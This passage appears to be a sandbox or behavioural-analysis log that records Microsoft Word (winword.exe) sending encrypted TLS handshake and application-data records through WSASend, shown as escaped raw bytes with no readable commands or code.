  331. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x041$\\x18\\x05\\xa7\\x95\\x19\\xda\\xc8\\x83p-\\x8e^\\x05\\xd4\\xa07r\\x03/\\xa0\\x05=m\\x81\\x15\\xef\\xf1\\xaa\\xdcl\\xc2)\\xc2\\xa5d\\x1b\\xa78\\xc5j\\xdf\\x95\\xda\\xd0d\\x8a\\xaf\\xf0y\\xe3\\xf8\\x80\\x91\\x87\\x9f&lfb\\x0cn\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x92\\xf9\\x94\\x0c \\xe0t\\xf7\\xf9\\xf1v\\xed^^\\x1c+\\xf9=\\xd0c(k\\x0e\\x87nq\\xb5\\xfc\\x9bj`\\xab\\x92;\\xe0\\x8a\\x0fz\\x05\\xa8\"l\\x08l<\\xaf\\xf4"
  332.  
  333.  
  334. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x97\\xd2\\x0cqq\\x1c\\x88x\\xf8k\\x9d\\xc0\\xec\\xf7\\xa6u\\x9d\\xbc\\x7f\\xd1\\xcco\\xee\\x8f\\x10\\xdb\\x11l\\x1e\\x95\\xf3\\x93d< \\xc9e\\x0c\\x10 \\xb3a\\x98\\xd5\\xeb\\xf6\\x15icx\\x8c\\x8b\\xe5\\x8c\\xaeo\\xa5h\\xd1\\x1ea\\x9d\\x17f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x81\\x9e7\\xe8e\\xd5\\xa3\\x06\\xbe\\xa6\\x16*j-f1sm\\xc9\\x97q42\\xdd\\xbf\\x02\\x1df\n\\xc5\\xb8\\x0f^-\\xb3\\x12\\xf0k\\x02\\x9f\\xf1\\x92v\\x00(\\x82\\x02"
  335.  
  336.  
  337. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xdcu\\xc1\\xd0\r\\xee\\xb9e\\xaa\\xed\\xf3\\x9a\\x17e\\xbd\\xbcb\\x17\\xfa\\xe6\n\\x88@'\\x9eh\\xfa~\\xb2\\xc2\\xb7\\x18\\xb1\\xdem\\xd5y1\\xfac$!\\xaen\\xa0\\xe8\\xd3\\xc3\"2\\xa2\\xa4h\\xbbr\\xb2\\x04\\xc6\\x07\\xed\\xb0m\\x7f'\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x85\\xb1(\\xdc\\\\x1a\\x81\\xaa\\xae\\xe5i\\xd9s\\xa8\\xe2ln$\\xff\\xd8\\xd0q\\x8c\\xc6\\x84^\\xf3\\x8d\\xb3y\rriq\\xa1;xl\\xb4\\xb8~\\xea\\x9f\\xf6 \\xfaz\\x9a"
  338.  
  339.  
  340. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc84&\\xc2\\xc2\\xd9b\\xb3\\xe6\\xd4\\xda\\xb4\\x91ye\\xbf\\x9f\\x05^g\\xc9\\xdeb\\xe7d\\xbc\\xbd\\x0c/\\xbbr\\xc7\\xa8\\xc9cfd\\xd9\\xb9\\x87_\\xf1\\x91%\\xfcz\\xf9\\x9cp\\x8f\\x96\\x8ad\\xef\\xf1\\x9e\\xae\\x9d\\xf4f3\\x95\\xe7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x8e#\\xc3\\xd5\\xd3-d\\x9d\\xa2v\\xce\\xe2+\\xf8\\x93p\\xe5\\x9fc\n|\\xcec\\xd3\\x9a\\x05\\xb0\\xf6\\xeb\\xc8\\xa5\\xa4\\x8a\\xae\\xe7\\x9cv\\x97\\x8a>\\xd4x_\\xd0\\xc55)\\xf1"
  341.  
  342.  
  343. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04x\\x1e\\xae\\xcd\\xa0%\\x88\\x99f\\xac\\x81\r\\xe3ci^q>6\\xf1\\x85\\x06\\x1e\\x8d\\xea\\x83\\x7f\\x9b\\xbfm\\xcep\\xff\\x12\\xe3p\\x1d\\xaf>w/\\xb3\\xf2\\xd4\\x18\\xbf\\xe2\\xc22-\\xe2\\x8c\\xa9\\xda\\x8e\\xf7a\\xe2^w\\x91\\x9di\\x88\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xca\\xde\\x82x\\x12\\x9d5\\x07\\xbb\\xe3:\\xc9\\xa1)\\x01\\x8f\\x86\\x93t7\\xcc\\x92\\xa08\\\\xd4z\\xc1w\\x05v\\x98/\\xac\\xa3\\x84\\xe1\\xefy\\xe4\\x92!\\xf3\\x1c\\xc2\\x87\\xda\\xc3"
  344.  
  345.  
  346. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04xc\\x99\\xf2\\xeb,\\x02\\xf4\\x1d.2\\xb8\\x01y\\x1a\\xf9\\xf8\\xc2j\\x87\\xe0\\xeb\\xe7,\\xc3\\xdft*\\x95\\x04g\\xb7\\x05\\xc2d~\\x84@\\x15c\\xce1\\xb0y\\xd4\\x90\\xac\\x06\\xbc\\x8a\t\\xe6\\e\\x84\\xe3 \\x13\\x0eo\\x96k\\x94\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfe%d\\xea(\\xc6k\\xe1r\\x18\\xf4\\xbe\\xbe&\\xa9\\xbb\\x9c\\xe2\\xb6\\x0f\\xdb\\x96\\x1d\\x84\\xc5\\x00k\\xaew*\\xd7\\xf8\\xa9\\xb5lf\\x1ff1$b\\x00\\x86#\\xea\\xc5\\x1e\\x8a"
  347.  
  348.  
  349. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2\\x94\\x03\\xb3\\xb9g\\x1a\\xcd \\x18\\xbe\\xb1\\x80\\x1e\\xe4m\\xe8\\x94\\x8bd\\xfb2s|\\x0b\\x86\\x11s\\xffw\\xba\\xfe\\x10\\xd7qb\\xf0\\xe4\\x85t\\xab~)\\x14\n\\xe2\\xa1n\\x92z\\x82\\xdb?\\x03\\xb2\\x81a\\x87y\\xed\\x83\\xe8\\xb1\\xe5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe85z\\xdf\\xb2\\x12#\\xb1nre\\xa3\\x00h\\xb89\\x1f\\xf4\\xefo6\\xd0\\xfc\\x19\\x11\\x127\\xdc\\xca\\x9d:q\\x84grz0;bc\\xb8\\xcf\\x00\\xc1\\xcbf\\xb7"
  350.  
  351.  
  352. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x99\\xee\\xcd\\xd1\\xa0\\x8b\\xe9\\xb9:q2p6\\xc9\\xf5(d\\x04\\x0f\\x9b\\xc4\\xe5<tp\\x9b\tx\\xf20\\xcf\\x03\\xdf\\x8bv\\xdco\\xd4\\xc7\\x00.:rku8l\\xf0l\\xe8<4\\x9c\\xd69g1`28\\x19\\xf7\\xd8\\xc0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000:n\\xd8\\x81\\xcf\\xd6+\\x1bf7\\x16\\x07\\x85r\\x8a#\\x12\\xea\\xa1bf\\xc9\\xf3\\xc9\\xda\\xd2\\x8fnu\\xf8g\\x05\\xa4\\xe2\\xe2g\\xda\\x8c$\\xf0\\x81\\xf2\\xf0j%m\\xb9\\x06"
  353.  
  354.  
  355. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04l\\xdd\\x0f\\x14\\xa6\\*w\\xae6g\\xd0\"\\x80\\xcb\\x9e\\xb4e\\xa1z\\xcb=\\xc3\\xe1\\x8f\\xd7\\x9b\\x86\\x88-w\\xb1\\xfc\\xc6\\xe7\\xa7\\x81\\x0e\\x14,\\xdf\\xb3\\xfd\\xf3\\x00\n\\x0b8\\x95\\xb4gaa\\x94\\x85\\xef\\x8b\\x8a\\x13\\xea'\\x19\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc8\\x99\\xee\\x9d\\x89\\xbb4\\x15\\x95\\x85\\xe6\\xb2\\x8aa\\xde\\x9f\\xf8d_\\xf4-g\\xb5\\xb9\\x90\\x14\\xdc\\xee\\xdf\r\\xf5.d\\x00\\x9d\\x92\\xdb\\x9c#x\\xbd.=&^\\xc6"
  356.  
  357.  
  358. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04o\\xf7p\\xe4os\\xa6|~\\x830\\xf8\r\\x02\\xb5\\xb2&\\xb7\\xa5\\xaaq\\xb0r\\xed\\x16\\xcf\\xdfd\\xaa\\xba\\xae\\xe6\\xde\\xbeq-\\xde9f\\xe7\\xed\\xa6\\x0c\\xdcm\\xab\\x1a\\xc5l\\xcfk\\xde\\xe3\\xd9\\xb6\\x82\\x85b\\xe6\\xf9g\\xc1\\x9f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe8\\xb3\\x02\\x80\\xb5\\xad\\xee6\\xb3\\x10\\x9e\\x1d^\\x01\\xb5\\xa7\\xd1\\x00\\xa4q\\xc7\\xf9\\x0b2q,\\xf5xgc\\xdaq\\xd2\\xcfk\\x7f'\\x9dw\\xd7\\x13\\x91\\x00\\xbe\\xe0&\\x94z"
  359.  
  360.  
  361. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010b\\x04\\x9c\\x85p\\xc8\\x830\\xaeb\\x1f\\xb7\\x17\\xef\\xf2_\\x00~w\\xe8b\\xc8\\xd7qz5\\xb7\\x06\\x1a\\xa7i\\xbbol\\x14\\xcc=|\\x90s\\xfb9|\\x9a\\x18hy\\xdf\\x9a%zc\\x1b\\xba\\x0c\\xe7>\n\\x16d\\xcf\\xa0?\\x1c\\xdb\t\\xaet;\\xad\\xbcfp\\xf0\\xc6\\xefh@\\xe0\\xda\\x03o9\\xd6\\xfd\\xfa\\xf8\\xe3\\xff\\xd2\r9\\xf4\\x11<`|\\x9b\\x1f\\xf2\\xcc\\xbe\\x934\\xb4\\x0c\\xae\\x17\\xe1/\r\\x82d\\x9a\\x1bb\\xe6obs\\xaa`\\xd0?\\x0c\\x183\\xe0\\xe7\\xb8\\x12\\xb8\\x88\\x83?w`\\x1f\\x10\\x9ew\"\\x8d\\x80\r\\xd1\\x02\\x9e\\xfbqt!z\\x8dh\\x93\\xa5(\\xdai\\xc8\\xc7\\x9c\\x13f\"\\xb6|\\x91<\\xe8\\xa5;\\xa6\\xcfcl\\xa3\\x8b\\xac\\xa9\\x16\\xba\\x14\\xa5\\x00j\\xd0d\\x97\r\\xc2t\\xa8r@\\x9eqj\\x98\\xee\\x1c\\x12;\\xe1cu\\x06\\xc4!\\x0e\\xeb\\xaf\\xa0u\\xd1zcgep\\x85\\x82\\xf3\r\\xfc\\xceq\\xeaid\\xfd\\xc8\\x88\\xe2\\xc6\\xcb\\x8f\\xb7:t\\xbe\\x10\\\\xaez"
  362.  
  363.  
  364. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04w\\xc71\\x00\\xc3kc\\xb6\\xfb\rso\\x93\\x93s6m\\x07\\xb3\\xd3\\xd4\\xaf\\xde/\\xc3o\\x8e\\xf6\\xd3^!'\\xe5\\xf3jp'\\xc8\\x0b\\x1bu\\xb8\\xfe\\xc1r/\\x1a\\xd5d\\xdfj->\tk\\x81\\xb2\\x87ta\\xfd\\xdf\\x1dh\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\n\\xdb\\\\xaf\\x93\\xe8\\x11\\xb3\\xc0\\x14\\xb15\\xfex\\xc0\\xab\\x9c\\x90\\xc5\\xbd\\xa3l.\\x1f\\xd3\\xed\\xf5\\xe2\\x10v\\xdc\\xeci\\xd6\\x98\\x16'0\nt\\xeel\\xe4a3\\xbf\\"
  365.  
  366.  
  367. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04n\\x01o\\xcc\\xd7\n\\xa1\\xe2\\x00g\\x16\\x16(\\xf2\\xa1\t\\x95f\\xc5\"d\\xab\\xc2\\x13\\xcb.\\x1c\\xab\\xf6)u\\x15w\\xd5\\x92\\xd6\\xb6/\\x89\\xc1j\\xdd\\xd3\t\\x0b\\\\x0c$/\t\\xb6\\x8a\\x8c\\x98?o\\xe4\\xea\\\\xbded\\xdf\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x05\\x048yd\\x8e\\x84\\xee\\xc4\\xbd\\xb2$\\x9a\\x05g\\xcc\\xf1\\x997\\xd5*\\x871\\xbd\\x9a\\xa0v\\xc5\\xb1\\xd2\\xcez\\x95\\x1b@\\x10\\x84j\\xbe\\x86\\xd4\\x9d\\xfe\\x07\\xe6 \n"
  368.  
  369.  
  370. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd0l~\\xd9\\xfe\\xc3\\xe1vc0km\\x9ft\\xb2j(\\xe1\\xd8\\xe7\\xc9\\xdc~c\\xe7\\x0eh\\xdd\\xfc\\xa1\\xad\\x95~\\xd3\\x10w\\x07\\xe5m\\x9eg_\\xc6i\\xa2*\\xc0\\x0b\\xf8.0\\xd0\\xa6\\xd7\\xe0\\x187\\x18\\xd7\\xc4e\\xb8\\xa1\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000p\\xd7\\xdc\",\\xab\\x030\\xfb\\x9bl\\xd1kn\\xd5\\xbc\t\\x1d\\x8bxx\\x8e\\xf5\\xe0\\x07q\\xd9\\x87q\\x8dmm\\x83\\xcd\\xded\\xcd2k~\\x90\\x80#\\x89\\xd5\\xccz"
  371.  
  372.  
  373. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04k\\xae\\xa9\\x14\\xea\\xe1\\xd8.\\\\x1b\\x1eq\\x94\\xf4\\xe9\\xa12\\xacm.a\\xc4\\xdbl\\xb6>\\x12\\xb7\\xeb%0\\x07\\x06rz\\xd48a\\x94r\\xb9\\x80,d6z\\xef\\xc5li\\x9az\\x03\\x18\\\\xf3l\\x11\\xbexg\\xcc\\x86\\x82\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000o\\xef\\xcdt\\x97zi\\x89+\\xed\\x885\\xbct\\x87\\xdf\\xe0g7\\xeft\n\\x9cvj\\xa1\\xf8\\xd1\\xf8\\xa78+\\xce\\x82\\x11p\\xa8\\xf7\\x1e\\x11\\xe5\\\\xfe(\\xec."
  374.  
  375.  
  376. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xda\\x17^\\x9c\\x8a,tm\\x03*\\xabkg\\xaav\\xe0~\\x9d\\xbc\\x0c\\x05\\xa4\\x9e\\xd2(n\\xa0\\x17\\x9d\\x0cit2\\x13\\x86_\\xb1w\\x04\\xc8\\xdf\\x17\\xc0\\xe4\\x85\\xc3\\xdf\\x8fc\\xe0s\\x9a\\x04\\xdc\\x1d#\\xf7\\xbe\\x8c&\\x15\\x939\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x00\\xf9\\x1eo\\xf6 \\xbd\\xabm/\\x89m\\x15\\xe3i\\xcb\\x87\\x00\\xe1_@@\\xa6\\xbb \\x18\r'\\x7fo\\xbfu<a\\xf6\\xdd\\xcfby\\x1e\\xcdj^z\\x87"
  377.  
  378.  
  379. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2w.\\x95\\x972\\xcc\\xce\\xf6\\xb4c\\xdbg\\x8bi\\xf8s\\xe4\\xf3\\x9a+\\xda\\x93l\\xe6n,\\xda\\x07\\xc9\\xbb\\x94\\xd9\\x1fo\\xc1w\\xe5\\xf9\\xa8\\xee4\\xab\\x0b\\x1c\\x86\\xe7\\xad\\?\\xe8\\xbf\"\\xf3$\\xbe\\xc7r\\xf1h5%h\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x12\\xd1 '@\\xfb\\xddz\\xd5$\\xb54\\xc6\\xe8\\x82\\xd8,\t\\x84_!\\xf91\\xa1\\xb8j\\x9da\\xc121w\\xccsy\n;\\xfc\\xe8\\xcd\\xdb&\r\\xdc\\xd6v\\xf0\\xf4"
  380.  
  381.  
  382. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04t<\\x7f f\\x11\\xa6\"\\x84\\x86\\xc8d\\x04s\\xca\\x92\\x17%\\xad\\x0b\\x11\\xbd#\\xc4nl9\\x0b\\xa8\\xb7\\xf8\\xf7p?fr\\x9elm\\q\\xca\\xa6\\xce\r~\\x1b\\xe7yj7)as\\xd5\\xec)w\\xa6\\xb6-5\\x9d\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf0,\\x02\\x9c\\xc4\\xc5s\\xacf/4\\xf8\\xb9\\xf0\\xa9\\x7f\t\\x1d\\xe9a\\xb0\\xfev_;\\xfbz\\xd4\\xb6\\x9e\\x951\\xc3\\x91\\xda\\x0f\\x92d@\\xce\\x92j\\x16\\x84\n\\xac"
  383.  
  384.  
  385. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x99x\t<\\xb8\\x17\t\\xc2i\\xc5\\xf1\\x1e\\xbe\\xbd,vn\\xc4kl0kf\\xaa\\x80e\\x7fj\\x87\\xbd\\x81py\\xac\\xa80uu\\xab\\xba;q\\xf9\\x18\\x91\\xb8\\x82_\\x0eph3\\xe1\\xaa\"\\xde\\xc0\n\\xb8 e\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfb%\\x87\n\\x9ae\\x159\\xf6\\x93\\x03p\\x13\rb\\xec9\\xd6\\x021\\xabr\\xaee\\x8f\\x89\\xb6\\x90\\x97\\xddm\\xb1\\x1d\\x95\\xfb\\x9b\\x03\\xb2\\x12\\xab\\xd8d(\\xb26o-"
  386.  
  387.  
  388. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc9\\xd4\\x14\\xf5dvp\\x1d\\xd0q\\xf2|>\\x8d\"\\x18\\x8a\\xa7(\\x1c(98i\\xa5\\xe9\\x16x%p\\x0f \\x8f21\n\\xb3.\\xf8nk\\x1b\\x12\\xba\\xf0\\xfd\\xd0\\xc1\\xb2\\xd9&+\\x0fm\\xc7\\xea\\x83_\\xf8\\xe4.\\xe9y\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xae\\xf3\\x03f\\x178\\x85ne\\xb9\\x92\r!\\x96t\\xbf_y\\xfb\\xb39/l^\\x99\\x95\\x8a\\xb4\\xb7\\xde\\xae\\xc2=\\xc7i\\xe0\\x08\\xf1\\xdfn\\xc4fh\\xac\\xfaj\\xa5"
  389.  
  390.  
  391. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010n\\xc7d\\x92&\\xaa\\xbc\\xc8\\xcf\\xe5^7\\x04\\x0fb\\xd3m\\x152h\\x1f\\x9e\\xd6\\x17c\\xb4w\\x8e\\xa2adg\\xe7\\xbe\\x05dn\\xa69\\x82\\xb0\\xc1w\\xb2\\x80\\x10\\x03\\xed%kh\\x99d\\x9e\\xf8\\xf3/\\xbeiy\\x8e\\x18\\xb2yw\r\\x13\\xea<\\x19\\xbdyu\\xe7\\xc6\\xb1\\xbde\\xf9#=\"\\xcb\\x9a\\x84=\\xd2\\xc2t\\xb6\\xd1\\xc1\\x14\\xc4m\\xf6~l\\xa3\\xd8\\xc8gx\\xd6\\xc3\\xdd\\xcd\\xc0jn\\x84w\\x1f#\\x03\\xacd\\x8c\\xd0a\\x8e\\xb4\\x11\\x91\\xd2\\xb0\\xc6\\x02\\xdc\\x88yut\\xbf\\xf8\\xe9\\xa4d-?k\\xe2c\\xfd\\x94h \\x9cs\\xd3\\x90\\xe89g\\xd9\\x99\\xb5\\x80p\\x87\\xb4`1\\xb5\\xaa\\xfa/\\xd3t\\xcfp\\xb0\\x9d\\xe2\\xa4m*\\xb9\\xb1>\\xd4\\xbc\\x8f\\x96\\x1az\\xe6\\xc1\\xdc\\x8f\\x82\\x9du\\xf4\\xcf\n\\xb7a\\x03\\xf0\\x1c\\x91\\x95f\\x98\\xee\\x8b\\x8e_&a\\x1f3$\\x8a;>\\xab\\xb5\\xce\\x17\\xb6\\x90\\xb5\\x12\\xcb\\x13\\x0b\\xb1c\\xe2\\xd7n\\xa6w\\x94\\x8ev\\xf4\\x92!\\xf0\\x7f\\xc2\\x98$h"
  392.  
  393.  
  394. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9df\\xa8=1\\xae\\x9c\\xf5\\x14*\\xe6\\x05y\\xc1\\xb6\\xa3e\\xf9e\\xbc\\xd1\\x8e\\x11aa\\xf2\\x9f\\xc4\\x8dt\t/\\x94f\\x00\\x95 \\xf1\\xa7=\\x93\\x1a\\xa5\\x1a\\\\x16\\xa2`i+\\x00\\xc0\\x12`\\x84\\xe9\\xa8\\x91\\xb3\\x9a+\\xfc\\x86\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000f\\x06t\\xaf\\xc9\\xcb\\xfd*\\xb2q\\xea\\xa3$_\\xc9\\xab\\xa5\\xa5\\x9c\\xc5\\x0f\\x0c)?&\\xc9\\x8dmj\\xeb\\x0b\\x86u4\\xeb*\\xb9\\x9b\\xf0\\xedy\\x8c\\xfe>\\xd8\\x94\\xd4c"
  395.  
  396.  
  397. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x7f.\\xd2\\xa2g\\x17\\xa5\\x0f\\xcd\\xa6\\xcbl\\x0b\\xdc\\xa3xo\\xd4\\xa5\\xf8x3\\x10>@\\x7f\\xa0ib\\xb1s\\xbd\\xb0\\x05\\xe8\\xb65zf\\xaed\\x8a\\x06\\x8c3\\x11\\x96\\x02\\xa6\\xa4\\x15\\xbf\\xd0\\xfa\\xefc\\\\x03\\xda\\x1es\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xd4\r\\xba\\x96\\xcdm\\x9f*\\xeeikjs\\x8b\\xeb6\\xcd\\x97\\xc1ka\\xc0\\x1a\\xa1\\xabj&oa\\x96\\xaem\\xfa\\xfem\\xf6\\xf2\\x1c\\x94\\x81\\x87\\xf7\\xa2\\x0br\\x04"
  398.  
  399.  
  400. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04ecw('\\xc1\\x93had\nq\\xb8\\xf9a\\x15\\xa03\\xaf\\x1b\\xf0\\xd6\\xe2d\\xa4n\\x9e\\xa7=\\xcblo\\xddn8o\\x15\\xdb\\xd8\\xae1,\\x0b\\xe0\\xdb\\x98\\x83\\x03hi\\xe0\\x0f\\x82l\\x0c\\xc5\\x9f\\x90/\\x17\\xf0^i\\xcc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xefg\\xbf<\\xff\\x8d;\\x01\\xe5\\xea\\xde\\x9a\\x19\\xcd\\x16e\\xae\\x06zp\\xf1\\xdc\\x86\\xd7zg\\xb8d\\xad\\xac\\x0e\\xe2t\\xafo\\xe3\\xa5\\xe0\\xc8\\x10s\\xd5z\\xb0\\x814-\\x12"
  401.  
  402.  
  403. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04=\\xc2\\xd0jo\\xc5's6\\x10z\\xa4n\\xb2\\x923\\x0b|b\\x95e\\xf8\\x92\"+\\x10\\xb4\\x9a\\xf3\\xc5#\\xdb\\x8aj\"\\x0c$\\x96g\\x05\\xac\\xdcs\\xbf\\x0b\\x99?co0\\xf8f\\xf7`\\xa3\\xf2i\\xaf\\xfa\\xeb\\x05'\\x04\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0001\\x92\\xfb\\xe5\\x8f\\x19\\xf2y\\x12\\xfd\\xb3\\x9a\\xf4\\x12w\\xc28g(\\xcf\\xbf\\xe1w\r\\x16 \\xbe\\x0f\\xf7/\\xa9\\xe2\\xd88\\xf5^\\x1b_\\x00\\xe9\\xfb$\n\\x99\\xeep"
  404.  
  405.  
  406. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa3\\xe3jy?\\x10\\xda`\\x97\\xc5\\x03#sf\\xcb\\x04\n^gw\\xeb\\x92\\xee\\xbf\\xb8\\xac\\xd6\\xeb\rc\\x082\\xd9'm\\xed\\xf0\\xb3\\x9c\\xb4\\xf4\\xedqal\\x1b=\\xffeq\\xf3\\x19\\x06\\xee6\\xf9\\xfb\\xadzrx\\xda\\x95\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x0e\\xd4 \\x12\\xb2\\xfb(\\xca\\x01$\\x04\\xba\\xbc(\\x1d\\x86\\xdf\\x0e\\x80\\xcf\\xb0\\xf4\\x10\\x18w\\xe7\\x1d\\x9d\\xfa8\\xda\\x1fqg\tg\\x94\\xe2\\xe2\\x04+\\xc0\t\\xb9q\\xb4"
  407.  
  408.  
  409. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb31\\xc1\\xac\\xf0!\\xa5@\\xe2\\x06\\xa7\\xd8\\xe9wh(*~\\xa611\\x83\\x19\\x13\\x8b\\xd6\rq\\x18jc2w_\\x12\\xf2\\x7fc\\x0b'\\x02b\"j\\x9c\\x18\\xbb\\xeb\\xc4\\x1aq\\x1e\\xdau\\xb6\\x15j\\x00\\xc7\t\\xf8b\\x96\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe4;u\\x94\\xdc\\xc6^\\x85\\x00b\\xc8\\xae\\xdf,\\xbb\\xafa\\x8d\\xf2\\x9co\\xddz\\xd8\\x1c$\\xf8a\\xe1\\x1d\\xab\\x08gr\\xaf\\x19\\xb9\\x83\\xdf_\\xe3v\\xd2\\x81\\xdd"
  410.  
  411.  
  412. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe8`\rf\\x0c\\xae&\\xde\\xf2'\\xda\\xcd\\xd3y\\xb0#\\xaad\\x83\\xbd\\x8a9\\x93+\\xa71\\xfa\\x13\\xaam/\\xc3\\xbb\\x0eq\\x80!4\\xa6\\xbeu\\x1b\\xc3\\xbe9\\xa3k\\xac\\xd87~1\\xc6\\x0fn\\x8f\\x04\\xd5\\xdb\\xed\\x10!\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000+)\\xdfk\\x9d\\\\xbep\\x1d\\xb8\\x85m?o\\xc8/u21\\xdf\\xee\\xd3\\xe3\\xe9\\x0ce\\xb8\\x8d <jj\\xa5j\\xfb\\x12\\xd0\\xe5ki\\xc6v\\x96\\xb0\\xca\\x97\\x93y"
  413.  
  414.  
  415. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010n\\xd4\\xe6@\\xa5\\xdf\\x83c\\xba\\x0b!f\\x7f\\x88\\xb9l\\xdcg\\xd9\\x99\\xd2\\x82\\xb3\\x14\\x8ewx\n<\\x00\\xb6\\xb9)q\\xb9\\\\x962\\x1cf\\xd6\\x9f\\xf6&\\x88d\\xbe\\xa6\\x13f:\\x14\\xc0\\xe0\\x9c\\x81\\xab\\x0eh\\xb1\\x06k7\\x1e<\\xe4\\x8f\\xfd\\x19\\x8c\\x1aa\\x84\\x97\\xe4?%\\x80\\xdew\\x9fb\\x8e\\xb5\\xfc\\xed\\x1a\\x91;\\xd7\\xb0d\\x18\\xaa~d\\xcf\\xf1\\xa3>\\xba\\x0b~\\xeb\\x19\\xa1\\x01q\\xc1\\xf8\\xe3\\x08\\x98\\x04\\xf6w!d\\xcb\\x1a\\x0e\\x1c\\xbf\\x8c\\xf2\\xacu\\\\xa9\\xc9\\x13\\xc7c\"\\x1a\\xd1z\\xca;\t\\xce\\xd8\\xd1\\xdf\\x80\\xfe\\xd8c\\xb7\\xef\\x1dv\\x92\\x82\\xf0(\\xd7pyz\\x1d\\x07n\\x1d\\x0c\\xcd\\xab\\xc3\\x8a\\xfao\\xc8\\xd8\\xd8\\xec\\xe6\\xb4\\xdf(\\xa9v\\xc0\\x9e\\xe9\\x00\\xda\\xa8,\\x08\\xa4\\xa7\r\\xd1\\xff\\x17\\b\\xafi\\x07\\xd8\\xde\\xa1\\xbb\\xfc\\x1f<\\x80\\x06k\\xba\\x90y\\x88\\x99'\\xe7\\xd6\\xa1\\xd5e4`r\\x8c#\\xfa\\xbe\\xe3d\\xa1\\x12\\xb9e\\x14\\x98x\\xf6\\x95j\\xca\\x16\";m~"
  416.  
  417.  
